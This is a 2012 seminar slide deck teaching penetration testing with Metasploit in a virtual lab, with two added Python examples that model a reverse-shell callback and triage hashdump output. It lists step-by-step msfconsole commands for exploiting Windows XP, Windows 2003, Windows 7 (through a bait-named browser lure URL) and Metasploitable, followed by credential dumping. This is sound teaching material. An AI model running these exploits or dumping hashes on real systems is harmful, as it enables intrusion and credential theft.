
penetration testing with metasploit

Presented by Syarif 3xu5


Seminar IT Security Safe The System Sumedang, April 29 2012 STMIK Sumedang

Sunday, April 29, 12

Agenda

Why & What is Penetration Testing ( Pentest )
<< back|track Overview
Metasploit Basics & Meterpreter
DEMO :)


Why Do a Pentest
Millions of dollars are invested in security programs to protect critical infrastructure and prevent data breaches *1)
A penetration test is one of the most effective ways to identify systemic weaknesses and deficiencies in these programs *1)


What is Penetration Testing

A method to evaluate the security of a computer system / network
Practice : attack an IT system the way a hacker would

Find security holes ( systemic weaknesses )
Bypass security mechanisms
Compromise an organization's IT system security

You must have permission from the IT system owner !

Illegal activity puts you in jail



Ethics
Think before you act
Don't be stupid
Don't be malicious


Pentest Phases
1. Information Gathering
2. Vulnerability Analysis
3. Exploitation
4. Post Exploitation
5. Reporting


<< back|track overview

Let's watch the video :)


<< back|track overview


The most advanced Linux security distribution
Real-world pentesting tools
Developed for security professionals
Open source & always will be


What is Metasploit
Not just a tool, but an entire framework *1)
An open source platform for writing security tools and exploits *2)
Easily build attack vectors to add to its exploits, payloads, encoders, ...
Create and execute more advanced attacks
Ruby based

Metasploit interfaces
MSFconsole
MSFcli
msfweb, msfgui ( discontinued )
Metasploit Pro, Metasploit Express
Armitage

MSFconsole


MSFcli


Metasploit Terminology

Exploit : code that allows a pentester to take advantage of a flaw within a system, application, or service *1)
Payload : code that we want the target system to execute ( e.g. a few commands to be executed on the target system ); the exploit is what delivers it *1)
Shellcode : a set of instructions used as the payload when exploitation occurs *1)
Module : a piece of software that can be used by Metasploit *1) ( exploit, payload, encoder, auxiliary and post modules )
Listener : a component that waits for an incoming connection *1) ( the handler a reverse payload connects back to on LHOST:LPORT )


How does exploitation work

1. attacker sends exploit + payload to the vulnerable server
2. the exploit runs, then the payload runs ( and opens a session back to the attacker )

Upload / Download data : attacker <-> vulnerable server over that session
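To make the two steps above and the Payload / Listener terminology concrete, here is an added loopback model; it is example code written for this page, not code from the slides or from Metasploit. Everything runs on 127.0.0.1 (assumed here in place of the lab's 172.16.240.143), there is no vulnerability and no shellcode: the "exploit" is simulated as the target starting our payload in a thread. What is real is the ordering and the network direction that LHOST/LPORT describe: the handler must be listening before the exploit fires, and a reverse_tcp payload connects from the target back to the attacker, who then drives it with commands (two harmless stand-ins for sysinfo and getpid are implemented).

```python
"""Loopback model of: start listener -> exploit runs -> payload runs -> callback.

Added example, not Metasploit code. No vulnerability, no shellcode: the exploit
step is simulated by the target starting our payload. LHOST is an assumption
for this demo (the slides use 172.16.240.143).
"""
import os
import platform
import socket
import threading

LHOST = "127.0.0.1"   # assumed attacker address for the demo
TIMEOUT = 5           # seconds; keeps the demo from hanging on a mistake


def send_line(sock, text):
    sock.sendall(text.encode() + b"\n")


def recv_line(sock):
    """Read one newline-terminated line; returns "" when the peer has closed."""
    buf = b""
    while not buf.endswith(b"\n"):
        chunk = sock.recv(1)
        if not chunk:
            break
        buf += chunk
    return buf.rstrip(b"\n").decode()


def local_sysinfo():
    return f"{platform.node()} / {platform.system()} {platform.release()}"


def local_pid():
    return str(os.getpid())


class Listener:
    """The handler: bound to LHOST:LPORT *before* the exploit is fired."""

    def __init__(self, lhost, lport=0):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((lhost, lport))          # lport=0: let the OS pick a free port
        self.sock.listen(1)
        self.sock.settimeout(TIMEOUT)
        self.lhost, self.lport = self.sock.getsockname()

    def handle(self, commands):
        """Accept one callback, send each command, collect replies, then close."""
        conn, _ = self.sock.accept()
        conn.settimeout(TIMEOUT)
        replies = []
        with conn:
            for cmd in commands:
                send_line(conn, cmd)
                replies.append(recv_line(conn))
            send_line(conn, "exit")
        self.sock.close()
        return replies


def reverse_tcp_payload(lhost, lport):
    """What a reverse_tcp payload does once the exploit has run on the target:
    connect *back* to the attacker and execute whatever the handler sends."""
    handlers = {"sysinfo": local_sysinfo, "getpid": local_pid}
    with socket.create_connection((lhost, lport), timeout=TIMEOUT) as s:
        while True:
            cmd = recv_line(s)
            if cmd in ("", "exit"):
                return
            fn = handlers.get(cmd, lambda: f"unknown command: {cmd}")
            send_line(s, fn())


def exploit_and_handle(commands=("sysinfo", "getpid")):
    """Steps 1 and 2 from the slide, in the order that actually works."""
    listener = Listener(LHOST)                      # 0. start the handler first
    target = threading.Thread(                      # 1. "exploit runs" ...
        target=reverse_tcp_payload,                 # 2. ... "then payload runs"
        args=(listener.lhost, listener.lport), daemon=True)
    target.start()
    replies = listener.handle(list(commands))       # payload calls back, we drive it
    target.join(TIMEOUT)
    return dict(zip(commands, replies))


def callback_without_handler():
    """Why the handler must be up first: with nothing listening, the callback is
    refused and the foothold is lost even though the exploit itself 'worked'."""
    probe = Listener(LHOST)
    port = probe.lport
    probe.sock.close()                              # nobody is listening on LPORT now
    try:
        reverse_tcp_payload(LHOST, port)
    except ConnectionRefusedError:
        return False
    return True


if __name__ == "__main__":
    print(exploit_and_handle())
    print("session without handler:", callback_without_handler())
```

Run it once and compare with the msfconsole flow on the following slides: `exploit` starts the handler on LHOST:LPORT and then fires the module, and a session only appears when the callback is accepted; the same model explains why LHOST must be an address the target can actually reach.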

Traditional Pentest vs Metasploit

Traditional Pentest
Public exploit gathering
Change offsets
Replace shellcode

Metasploit for Pentest
Load Metasploit
Choose the target OS
Use exploit
Set payload
Execute

Meterpreter

Used as a payload after a vulnerability is exploited *1)
Improves post exploitation
Exploiting a vulnerability -> meterpreter shell : select meterpreter as the payload before running the exploit

Meterpreter command

Pentest Scenario

Attacker and vulnerable OS * on VMware

* : e.g. Ubuntu 8.04 Metasploitable

OS in the Lab

BackTrack 5 R2 ( attacker )             IP address : 172.16.240.143
Windows XP SP2                          IP address : 172.16.240.129
Windows 2003 Server                     IP address : 172.16.240.141
Windows 7                               IP address : 172.16.240.142
Ubuntu Linux 8.04 ( Metasploitable )    IP address : 172.16.240.144

Windows XP Exploitation

msf > search windows/smb
msf > info exploit/windows/smb/ms08_067_netapi
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 172.16.240.129
msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > exploit
meterpreter > background
msf exploit(ms08_067_netapi) > sessions -l

Windows XP Post Exploitation

msf exploit(ms08_067_netapi) > sessions -i 1
meterpreter > getsystem -h
meterpreter > getuid
meterpreter > hashdump
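hashdump reads the local SAM (it needs SYSTEM, which is why getsystem comes before it) and prints one pwdump-style line per account, user:RID:LM hash:NT hash:::. The next thing a pentester does with that output is triage it before spending time on a cracker. The script below is an added example, not code from the slides or from Metasploit; SAMPLE_HASHDUMP is constructed data, not taken from the lab hosts, and the two non-empty hashes in it are the publicly known LM/NT hashes of the string "password". It flags blank passwords (NT hash of the empty string), accounts that still store an LM hash, a renamed built-in Administrator (RID 500), and accounts sharing one NT hash.

```python
"""Triage of meterpreter `hashdump` output (pwdump format user:RID:LM:NT:::).

Added example, not Metasploit code. SAMPLE_HASHDUMP is constructed; the
"password" hashes are the well-known LM/NT hashes of the word "password".
"""
from collections import defaultdict

# LM field seen when no LM hash is stored (LM disabled, or password empty).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
# NT hash of the empty string: the account has a blank password.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
labadmin:1003:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
svc_backup:1004:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
"""


def parse_hashdump(text):
    """Parse hashdump lines into dicts; hashes are normalised to lowercase hex."""
    creds = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        parts = line.split(":")
        if len(parts) < 4 or len(parts[2]) != 32 or len(parts[3]) != 32:
            raise ValueError(f"not a pwdump line: {line!r}")
        creds.append({
            "user": parts[0],
            "rid": int(parts[1]),
            "lm": parts[2].lower(),
            "nt": parts[3].lower(),
        })
    return creds


def triage(creds):
    """Return (who, finding) pairs worth knowing before cracking anything:
    blank passwords need no cracking, stored LM hashes fall to rainbow tables,
    and a shared NT hash means one cracked password opens several accounts."""
    findings = []
    by_nt = defaultdict(list)
    for c in creds:
        if c["rid"] == 500 and c["user"] != "Administrator":
            findings.append((c["user"], "renamed built-in Administrator (RID 500)"))
        if c["nt"] == EMPTY_NT:
            findings.append((c["user"], "blank password"))
        elif c["lm"] != EMPTY_LM:
            findings.append((c["user"], "LM hash stored"))
        by_nt[c["nt"]].append(c["user"])
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            findings.append((",".join(sorted(users)), "shared NT hash (password reuse)"))
    return findings


if __name__ == "__main__":
    for who, what in triage(parse_hashdump(SAMPLE_HASHDUMP)):
        print(f"{who:25} {what}")
```

Paste the real hashdump output into parse_hashdump in place of the sample; the shared-hash check is the one that pays off most in a lab like this one, because a local administrator password reused across the Windows hosts turns one session into three.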

Windows 2003 Server Exploitation

msf > search windows/smb
msf > info exploit/windows/smb/ms08_067_netapi
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 172.16.240.141
msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > exploit
meterpreter > background
msf exploit(ms08_067_netapi) > sessions -l

Windows 7 Exploitation

msf > use exploit/windows/browser/ms11_003_ie_css_import
msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms11_003_ie_css_import) > show options
msf exploit(ms11_003_ie_css_import) > set SRVHOST 172.16.240.143
msf exploit(ms11_003_ie_css_import) > set SRVPORT 80
msf exploit(ms11_003_ie_css_import) > set URIPATH miyabi-naked.avi
msf exploit(ms11_003_ie_css_import) > set LHOST 172.16.240.143
msf exploit(ms11_003_ie_css_import) > set LPORT 443
msf exploit(ms11_003_ie_css_import) > exploit

This is a client-side ( browser ) exploit : just wait until the victim opens the URL http://172.16.240.143:80/miyabi-naked.avi in Internet Explorer

msf exploit(ms11_003_ie_css_import) > sessions -l
msf exploit(ms11_003_ie_css_import) > sessions -i 1
meterpreter > sysinfo
meterpreter > shell

Ubuntu 8.04 Metasploitable Exploitation

msf > search distcc
msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > show payloads
msf exploit(distcc_exec) > set PAYLOAD cmd/unix/reverse
msf exploit(distcc_exec) > show options
msf exploit(distcc_exec) > set RHOST 172.16.240.144
msf exploit(distcc_exec) > set LHOST 172.16.240.143
msf exploit(distcc_exec) > exploit

Any Questions ?
Contact me

website : http://3x.us
Official BackTrack Indonesia Community : http://indobacktrack.or.id
Email : 3xu5@indobacktrack.or.id
twitter : @3xu5

Greets & Thanks To

BackTrack Linux
Metasploit Team ( HD Moore & Rapid7 )
Offensive Security / Metasploit Unleashed
David Kennedy
Georgia Weidman

References

1. Metasploit: The Penetration Tester's Guide : David Kennedy, Jim O'Gorman, Devon Kearns, Mati Aharoni
2. http://www.metasploit.com
3. http://www.offensive-security.com/metasploit-unleashed/Main_Page
4. http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines
